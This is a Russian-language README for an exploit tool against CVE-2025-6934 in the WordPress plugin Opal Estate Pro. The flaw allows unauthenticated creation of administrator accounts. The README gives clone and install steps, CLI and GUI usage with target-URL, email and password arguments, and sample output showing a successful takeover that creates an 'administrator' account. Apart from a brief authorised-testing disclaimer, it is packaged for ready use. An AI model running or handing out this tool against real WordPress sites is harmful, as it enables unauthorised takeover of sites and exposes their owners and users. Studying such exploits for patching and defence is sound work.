
CVE-2025-6934 Эксплойт-инструмент: Создание учетной записи администратора без аутентификации в плагине WordPress Opal Estate Pro
Создано и полностью разработано mejbankadir (SMH tech и Mejban HackSheild под эгидой NexoAmicus)
CVE-2025-6934 — это критическая уязвимость в плагине WordPress Opal Estate Pro (версии <= 1.7.5), которая позволяет неавторизованным злоумышленникам создавать учётные записи администратора на уязвимых сайтах WordPress.
Этот инструмент предоставляет версии как CLI (командная строка), так и GUI (графический интерфейс) для эксплуатации данной уязвимости.
| Атрибут | Значение |
|---|---|
| CVE ID | CVE-2025-6934 |
| Серьёзность | Критическая (CVSS 3.1: 9.8) |
| Затрагиваемый плагин | Opal Estate Pro |
| Затрагиваемые версии | <= 1.7.5 |
| Тип уязвимости | Неавторизованное создание учётной записи администратора |
| Вектор CVSS | AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
# Клонирование репозитория
git clone https://github.com/mejbankadir/CVE-2025-6934.git
cd CVE-2025-6934
# Установка зависимостей
pip install -r requirements.txt
requests
beautifulsoup4
colorama
PyQt6 # Только для версии с GUI
python3 CVE-2025-6934-GUI.py
Возможности GUI:
python3 CVE-2025-6934.py -u http://target.com -mail [email protected] -password P@ssw0rd123
Аргументы:
-u, --url URL цели (обязательно)
-mail, --newemail Адрес электронной почты для учётной записи администратора (обязательно)
-password, --newpassword Пароль для учётной записи администратора (обязательно)
-user, --username Имя пользователя для учётной записи администратора (по умолчанию: administrator)
┌─────────────────────────────────────────────────────────────┐
│ _____________ _______________ │
│ \_ ___ \ \ / /\_ _____/ │
│ / \ \/\ Y / | __)_ ______ │
│ \ \____\ / | \ /_____/ │
│ \______ / \___/ /_______ / │
│ \/ \/ │
│ │
│ CVE-2025-6934 Exploit PoC │
│ │
│ Created and developed fully by mejbankadir │
│ (SMH tech and Mejban HackSheild Under NexoAmicus) │
└─────────────────────────────────────────────────────────────┘
$ python3 CVE-2025-6934.py -u http://example.com -mail [email protected] -password MyP@ss123
[•] Starting Exploit Attempt...
[•] Nonce Found: a1b2c3d4e5f6...
[✔] Exploit Successful!
Username : administrator
Email : [email protected]
Password : MyP@ss123
Role : administrator
⚠️ ВНИМАНИЕ: Этот инструмент предоставляется только для образовательных целей и санкционированного тестирования безопасности.
Несанкционированный доступ к компьютерным системам незаконен и неэтичен.
Используя этот инструмент, вы соглашаетесь:
- Тестировать только те системы, которые принадлежат вам или на которые у вас есть явное разрешение
- Не использовать этот инструмент в злонамеренных целях
- Принимать на себя всю ответственность за любые юридические последствия
| Роль | Имя |
|---|---|
| Создатель и разработчик | mejbankadir |
| Организация | SMH tech & Mejban HackSheild под эгидой NexoAmicus |
CVE-2025-6934/
├── CVE-2025-6934.py # Версия CLI
├── CVE-2025-6934-GUI.py # Версия GUI
├── CVE-2025-6934.yaml # Документация
├── requirements.txt # Зависимости Python
└── README.md # Этот файл
Инструмент автоматически отключает предупреждения SSL. Если возникают проблемы:
requests.packages.urllib3.disable_warnings()
Лицензия MIT
Copyright (c) 2025 mejbankadir (SMH tech и Mejban HackSheild под эгидой NexoAmicus)
Сделано с ❤️ от mejbankadir
SMH tech | Mejban HackSheild | Под эгидой NexoAmicus